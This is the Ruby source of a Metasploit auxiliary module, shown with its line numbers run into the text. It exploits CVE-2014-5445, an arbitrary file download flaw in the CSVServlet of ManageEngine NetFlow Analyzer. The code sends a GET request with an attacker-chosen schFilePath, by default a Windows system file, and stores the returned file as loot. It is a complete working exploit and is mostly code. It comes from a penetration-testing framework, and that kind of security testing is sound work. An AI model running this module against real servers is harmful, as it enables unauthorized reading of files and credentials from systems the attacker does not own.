Path: blob/master/modules/auxiliary/admin/http/netflow_file_download.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Exploit::Remote::HttpClient89def initialize(info = {})10super(11update_info(12info,13'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',14'Description' => %q{15This module exploits an arbitrary file download vulnerability in CSVServlet16on ManageEngine NetFlow Analyzer. This module has been tested on both Windows17and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you18must escape the backslash with a backslash.19},20'Author' => [21'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module22],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2014-5445' ],26[ 'OSVDB', '115340' ],27[ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],28[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]29],30'DisclosureDate' => '2014-11-30',31'Notes' => {32'Stability' => [CRASH_SAFE],33'SideEffects' => [IOC_IN_LOGS],34'Reliability' => []35}36)37)3839register_options(40[41Opt::RPORT(8080),42OptString.new('TARGETURI',43[ true, 'The base path to NetFlow Analyzer', '/netflow' ]),44OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),45]46)47end4849def run50# Create request51begin52print_status("Downloading file #{datastore['FILEPATH']}")53res = send_request_cgi({54'method' => 'GET',55'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),56'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }57})58rescue Rex::ConnectionError59print_error('Could not connect.')60return61end6263# Show data if needed64if res && res.code == 20065if res.body.to_s.bytesize == 066print_error('0 bytes returned, file does not exist or it is empty.')67return68end69vprint_line(res.body.to_s)70fname = File.basename(datastore['FILEPATH'])7172path = store_loot(73'netflow.http',74'application/octet-stream',75datastore['RHOST'],76res.body,77fname78)79print_good("File saved in: #{path}")80else81print_error('Failed to download file.')82end83end84end858687